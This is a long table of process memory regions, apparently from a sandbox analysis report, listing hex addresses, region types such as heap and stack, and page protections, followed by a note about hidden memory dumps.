|
heap
|
page read and write
|
||
20F9AE29000
|
heap
|
page read and write
|
||
14CA5C65000
|
heap
|
page read and write
|
||
26F9A900000
|
trusted library allocation
|
page read and write
|
||
FC876FF000
|
stack
|
page read and write
|
||
175F186A000
|
heap
|
page read and write
|
||
C75AC79000
|
stack
|
page read and write
|
||
19A96E54000
|
heap
|
page read and write
|
||
2260C402000
|
trusted library allocation
|
page read and write
|
||
20906A03000
|
heap
|
page read and write
|
||
20F9AE57000
|
heap
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
20F9AE3D000
|
heap
|
page read and write
|
||
26F95C11000
|
heap
|
page read and write
|
||
20FA0514000
|
heap
|
page read and write
|
||
5184FF000
|
stack
|
page read and write
|
||
20FA0724000
|
trusted library allocation
|
page read and write
|
||
209065B0000
|
heap
|
page read and write
|
||
20FA04B9000
|
heap
|
page read and write
|
||
1F51C061000
|
heap
|
page read and write
|
||
20905C70000
|
heap
|
page read and write
|
||
20FA045A000
|
heap
|
page read and write
|
||
194D9602000
|
trusted library allocation
|
page read and write
|
||
1AA740E0000
|
heap
|
page read and write
|
||
2090658B000
|
heap
|
page read and write
|
||
20905CAB000
|
heap
|
page read and write
|
||
22E915E5000
|
heap
|
page read and write
|
||
20905CA4000
|
heap
|
page read and write
|
||
ED1D77E000
|
stack
|
page read and write
|
||
20906595000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
23167545000
|
heap
|
page read and write
|
||
26F97A20000
|
heap
|
page read and write
|
||
20FA0515000
|
heap
|
page read and write
|
||
274E3A86000
|
heap
|
page read and write
|
||
22E91DBD000
|
heap
|
page read and write
|
||
2090657B000
|
heap
|
page read and write
|
||
E0057F000
|
stack
|
page read and write
|
||
44DB8FF000
|
stack
|
page read and write
|
||
175F1824000
|
heap
|
page read and write
|
||
1F51C05C000
|
heap
|
page read and write
|
||
44DBC7C000
|
stack
|
page read and write
|
||
20906550000
|
heap
|
page read and write
|
||
20BD0100000
|
heap
|
page read and write
|
||
194D8E13000
|
heap
|
page read and write
|
||
209065B5000
|
heap
|
page read and write
|
||
ED1D17B000
|
stack
|
page read and write
|
||
20906570000
|
heap
|
page read and write
|
||
20FA050F000
|
heap
|
page read and write
|
||
194D8CE0000
|
heap
|
page read and write
|
||
20906A02000
|
heap
|
page read and write
|
||
20906593000
|
heap
|
page read and write
|
||
20FA0510000
|
heap
|
page read and write
|
||
26F95BC0000
|
heap
|
page read and write
|
||
C75AF7E000
|
stack
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
20FA0535000
|
heap
|
page read and write
|
||
26F95BC5000
|
heap
|
page read and write
|
||
20FA0350000
|
trusted library allocation
|
page read and write
|
||
A6A28FF000
|
stack
|
page read and write
|
||
20906526000
|
heap
|
page read and write
|
||
2090650C000
|
heap
|
page read and write
|
||
14CA5C13000
|
heap
|
page read and write
|
||
20FA03E0000
|
trusted library allocation
|
page read and write
|
||
D09A67E000
|
stack
|
page read and write
|
||
1F51C079000
|
heap
|
page read and write
|
||
20FA0340000
|
trusted library allocation
|
page read and write
|
||
20906585000
|
heap
|
page read and write
|
||
209065B1000
|
heap
|
page read and write
|
||
2090651A000
|
heap
|
page read and write
|
||
23167361000
|
heap
|
page read and write
|
||
20BCF702000
|
heap
|
page read and write
|
||
274E3A66000
|
heap
|
page read and write
|
||
26F95C5C000
|
heap
|
page read and write
|
||
2260BA50000
|
heap
|
page read and write
|
||
A6A2677000
|
stack
|
page read and write
|
||
5186FF000
|
stack
|
page read and write
|
||
A6A237F000
|
stack
|
page read and write
|
||
1AA741A0000
|
remote allocation
|
page read and write
|
||
19A96E3D000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
23167368000
|
heap
|
page read and write
|
||
2260BC3A000
|
heap
|
page read and write
|
||
FC87B7F000
|
stack
|
page read and write
|
||
1AA74251000
|
heap
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
6D5E7FF000
|
stack
|
page read and write
|
||
22E91443000
|
heap
|
page read and write
|
||
194D8E6F000
|
heap
|
page read and write
|
||
19A96D70000
|
trusted library allocation
|
page read and write
|
||
20905BD0000
|
remote allocation
|
page read and write
|
||
22E91513000
|
heap
|
page read and write
|
||
22E91471000
|
heap
|
page read and write
|
||
20FA0310000
|
trusted library allocation
|
page read and write
|
||
20FA0514000
|
heap
|
page read and write
|
||
19A96CE0000
|
heap
|
page read and write
|
||
FC87A77000
|
stack
|
page read and write
|
||
20FA07A0000
|
remote allocation
|
page read and write
|
||
20FA050A000
|
heap
|
page read and write
|
||
26F975D0000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
20905CEC000
|
heap
|
page read and write
|
||
2090657D000
|
heap
|
page read and write
|
||
D09A07E000
|
stack
|
page read and write
|
||
20FA0510000
|
heap
|
page read and write
|
||
80971FF000
|
stack
|
page read and write
|
||
14CA5C29000
|
heap
|
page read and write
|
||
2260BC13000
|
heap
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
175F1888000
|
heap
|
page read and write
|
||
20FA0416000
|
heap
|
page read and write
|
||
26F95AF0000
|
heap
|
page read and write
|
||
20905CED000
|
heap
|
page read and write
|
||
FC8777F000
|
stack
|
page read and write
|
||
20905D16000
|
heap
|
page read and write
|
||
22E91E23000
|
heap
|
page read and write
|
||
20906576000
|
heap
|
page read and write
|
||
1F51C042000
|
heap
|
page read and write
|
||
14CA5A90000
|
heap
|
page read and write
|
||
274E3950000
|
heap
|
page read and write
|
||
C60C07E000
|
stack
|
page read and write
|
||
22E91DB1000
|
heap
|
page read and write
|
||
22E91400000
|
heap
|
page read and write
|
||
20F9AE00000
|
heap
|
page read and write
|
||
20F9AE7B000
|
heap
|
page read and write
|
||
8096A7B000
|
stack
|
page read and write
|
||
D09A37F000
|
stack
|
page read and write
|
||
20F9B602000
|
heap
|
page read and write
|
||
20FA051F000
|
heap
|
page read and write
|
||
23167150000
|
heap
|
page read and write
|
||
14CA5C7C000
|
heap
|
page read and write
|
||
1F51C029000
|
heap
|
page read and write
|
||
20F9B79C000
|
heap
|
page read and write
|
||
20F9AE94000
|
heap
|
page read and write
|
||
19A96E02000
|
heap
|
page read and write
|
||
22E912D0000
|
heap
|
page read and write
|
||
8096CFD000
|
stack
|
page read and write
|
||
175F17B0000
|
trusted library allocation
|
page read and write
|
||
20905CAE000
|
heap
|
page read and write
|
||
20905A10000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
20FA0514000
|
heap
|
page read and write
|
||
428FBF9000
|
stack
|
page read and write
|
||
1F51C026000
|
heap
|
page read and write
|
||
1F51BFA0000
|
heap
|
page read and write
|
||
1F51C044000
|
heap
|
page read and write
|
||
19A96E13000
|
heap
|
page read and write
|
||
26F97570000
|
heap
|
page read and write
|
||
BE5547F000
|
stack
|
page read and write
|
||
2090657E000
|
heap
|
page read and write
|
||
20906590000
|
heap
|
page read and write
|
||
A6A247A000
|
stack
|
page read and write
|
||
ED1D3F9000
|
stack
|
page read and write
|
||
14CA5D13000
|
heap
|
page read and write
|
||
D09AA7E000
|
stack
|
page read and write
|
||
14CA6402000
|
trusted library allocation
|
page read and write
|
||
194D8C80000
|
heap
|
page read and write
|
||
D09996B000
|
stack
|
page read and write
|
||
20FA0535000
|
heap
|
page read and write
|
||
22E915B9000
|
heap
|
page read and write
|
||
175F183C000
|
heap
|
page read and write
|
||
175F1780000
|
heap
|
page read and write
|
||
20BCF613000
|
heap
|
page read and write
|
||
20F9ADE1000
|
trusted library allocation
|
page read and write
|
||
20BCF6D1000
|
heap
|
page read and write
|
||
1F51C05E000
|
heap
|
page read and write
|
||
20906500000
|
heap
|
page read and write
|
||
2260BD02000
|
heap
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
175F2202000
|
trusted library allocation
|
page read and write
|
||
194D8E65000
|
heap
|
page read and write
|
||
20FA07A0000
|
remote allocation
|
page read and write
|
||
A6A2577000
|
stack
|
page read and write
|
||
20FA0514000
|
heap
|
page read and write
|
||
20F9B79C000
|
heap
|
page read and write
|
||
1F51C06C000
|
heap
|
page read and write
|
||
20905C4C000
|
heap
|
page read and write
|
||
274E3960000
|
heap
|
page read and write
|
||
194D8E02000
|
heap
|
page read and write
|
||
1AA74170000
|
trusted library allocation
|
page read and write
|
||
175F1870000
|
heap
|
page read and write
|
||
1F51C04E000
|
heap
|
page read and write
|
||
209065B1000
|
heap
|
page read and write
|
||
20FA0708000
|
trusted library allocation
|
page read and write
|
||
2260BC4F000
|
heap
|
page read and write
|
||
209065CB000
|
heap
|
page read and write
|
||
1AA741A0000
|
remote allocation
|
page read and write
|
||
D09A87E000
|
stack
|
page read and write
|
||
C60C5FF000
|
stack
|
page read and write
|
||
20F9AE97000
|
heap
|
page read and write
|
||
20FA050C000
|
heap
|
page read and write
|
||
175F1720000
|
heap
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
A6A287B000
|
stack
|
page read and write
|
||
20FA042E000
|
heap
|
page read and write
|
||
20FA0880000
|
trusted library allocation
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
20F9AE8E000
|
heap
|
page read and write
|
||
20906A00000
|
heap
|
page read and write
|
||
20BCF629000
|
heap
|
page read and write
|
||
6D5E57C000
|
stack
|
page read and write
|
||
20F9B615000
|
heap
|
page read and write
|
||
274E3B02000
|
heap
|
page read and write
|
||
44DBF7E000
|
stack
|
page read and write
|
||
20FA048D000
|
heap
|
page read and write
|
||
20FA0321000
|
trusted library allocation
|
page read and write
|
||
20FA0532000
|
heap
|
page read and write
|
||
E0067D000
|
stack
|
page read and write
|
||
20BCF540000
|
heap
|
page read and write
|
||
22E91494000
|
heap
|
page read and write
|
||
2260BD13000
|
heap
|
page read and write
|
||
1F51C102000
|
heap
|
page read and write
|
||
C75AEFF000
|
stack
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
ED1D6FE000
|
stack
|
page read and write
|
||
20BCF550000
|
heap
|
page read and write
|
||
20F9B718000
|
heap
|
page read and write
|
||
175F1813000
|
heap
|
page read and write
|
||
14CA5D00000
|
heap
|
page read and write
|
||
20FA0504000
|
heap
|
page read and write
|
||
20FA0290000
|
trusted library allocation
|
page read and write
|
||
1F51C05A000
|
heap
|
page read and write
|
||
175F1902000
|
heap
|
page read and write
|
||
20905B10000
|
trusted library allocation
|
page read and write
|
||
428FAFF000
|
stack
|
page read and write
|
||
274E3B13000
|
heap
|
page read and write
|
||
2090656E000
|
heap
|
page read and write
|
||
209065A0000
|
heap
|
page read and write
|
||
175F184A000
|
heap
|
page read and write
|
||
20FA032C000
|
trusted library allocation
|
page read and write
|
||
20BCF600000
|
heap
|
page read and write
|
||
2260BA60000
|
heap
|
page read and write
|
||
D09A77A000
|
stack
|
page read and write
|
||
C75AE7E000
|
stack
|
page read and write
|
||
23167367000
|
heap
|
page read and write
|
||
20F9B901000
|
trusted library allocation
|
page read and write
|
||
8096FFE000
|
stack
|
page read and write
|
||
1F51C048000
|
heap
|
page read and write
|
||
20905C57000
|
heap
|
page read and write
|
||
209065B5000
|
heap
|
page read and write
|
||
20906593000
|
heap
|
page read and write
|
||
BE54DFB000
|
stack
|
page read and write
|
||
1F51CA02000
|
trusted library allocation
|
page read and write
|
||
20FA0508000
|
heap
|
page read and write
|
||
2260BC00000
|
heap
|
page read and write
|
||
D09A17B000
|
stack
|
page read and write
|
||
A6A1F1F000
|
stack
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
1F51C03D000
|
heap
|
page read and write
|
||
1AA74240000
|
heap
|
page read and write
|
||
22E91BA0000
|
trusted library allocation
|
page read and write
|
||
1AA74213000
|
heap
|
page read and write
|
||
20F9B79C000
|
heap
|
page read and write
|
||
22E91456000
|
heap
|
page read and write
|
||
C60C2FB000
|
stack
|
page read and write
|
||
D099D77000
|
stack
|
page read and write
|
||
1F51C05F000
|
heap
|
page read and write
|
||
20FA050E000
|
heap
|
page read and write
|
||
A6A277E000
|
stack
|
page read and write
|
||
20906591000
|
heap
|
page read and write
|
||
ED1D27F000
|
stack
|
page read and write
|
||
E004FD000
|
stack
|
page read and write
|
||
22E9146A000
|
heap
|
page read and write
|
||
20FA0760000
|
trusted library allocation
|
page read and write
|
||
20FA0270000
|
trusted library allocation
|
page read and write
|
||
26F95C16000
|
heap
|
page read and write
|
||
20F9BF20000
|
trusted library section
|
page readonly
|
||
20FA0511000
|
heap
|
page read and write
|
||
20F9BC00000
|
trusted library allocation
|
page read and write
|
||
22E91D6D000
|
heap
|
page read and write
|
||
23167360000
|
heap
|
page read and write
|
||
20FA0300000
|
trusted library allocation
|
page read and write
|
||
428FA7A000
|
stack
|
page read and write
|
||
6D5EEFE000
|
stack
|
page read and write
|
||
5183F7000
|
stack
|
page read and write
|
||
274E39C0000
|
heap
|
page read and write
|
||
20FA0530000
|
heap
|
page read and write
|
||
517DBE000
|
stack
|
page read and write
|
||
20F9AE90000
|
heap
|
page read and write
|
||
2090658E000
|
heap
|
page read and write
|
||
6D5ECFB000
|
stack
|
page read and write
|
||
20FA02B0000
|
trusted library allocation
|
page read and write
|
||
23167370000
|
heap
|
page read and write
|
||
1F51BF30000
|
heap
|
page read and write
|
||
26F95C1A000
|
heap
|
page read and write
|
||
20F9BD00000
|
trusted library allocation
|
page read and write
|
||
209065A0000
|
heap
|
page read and write
|
||
20F9BED0000
|
trusted library section
|
page readonly
|
||
20905CFC000
|
heap
|
page read and write
|
||
3F4FC7F000
|
stack
|
page read and write
|
||
209065B2000
|
heap
|
page read and write
|
||
C60C4FF000
|
stack
|
page read and write
|
||
20F9AE72000
|
heap
|
page read and write
|
||
22E9147A000
|
heap
|
page read and write
|
||
1F51C040000
|
heap
|
page read and write
|
||
2260BAC0000
|
heap
|
page read and write
|
||
209065B5000
|
heap
|
page read and write
|
||
A6A1E9B000
|
stack
|
page read and write
|
||
22E9145A000
|
heap
|
page read and write
|
||
2090651D000
|
heap
|
page read and write
|
||
A6A2BFA000
|
stack
|
page read and write
|
||
20BCF6C0000
|
heap
|
page read and write
|
||
20906A20000
|
heap
|
page read and write
|
||
274E3A46000
|
heap
|
page read and write
|
||
26F95C49000
|
heap
|
page read and write
|
||
20905C29000
|
heap
|
page read and write
|
||
20906572000
|
heap
|
page read and write
|
||
19A97802000
|
trusted library allocation
|
page read and write
|
||
19A96D40000
|
heap
|
page read and write
|
||
175F1710000
|
heap
|
page read and write
|
||
20F9BF00000
|
trusted library section
|
page readonly
|
||
80973FF000
|
stack
|
page read and write
|
||
8096BFF000
|
stack
|
page read and write
|
||
22E91D22000
|
heap
|
page read and write
|
||
20906587000
|
heap
|
page read and write
|
||
20F9BDF0000
|
trusted library allocation
|
page read and write
|
||
20F9C270000
|
trusted library allocation
|
page read and write
|
||
2090659F000
|
heap
|
page read and write
|
||
19A96F02000
|
heap
|
page read and write
|
||
209065D4000
|
heap
|
page read and write
|
||
D09A27B000
|
stack
|
page read and write
|
||
C60C0FE000
|
stack
|
page read and write
|
||
20905CC7000
|
heap
|
page read and write
|
||
20FA0310000
|
trusted library allocation
|
page read and write
|
||
20906585000
|
heap
|
page read and write
|
||
6D5E97C000
|
stack
|
page read and write
|
||
20FA0515000
|
heap
|
page read and write
|
||
274E3A4C000
|
heap
|
page read and write
|
||
23167352000
|
heap
|
page read and write
|
||
1AA740D0000
|
heap
|
page read and write
|
There are 724 hidden memdumps, click here to show them.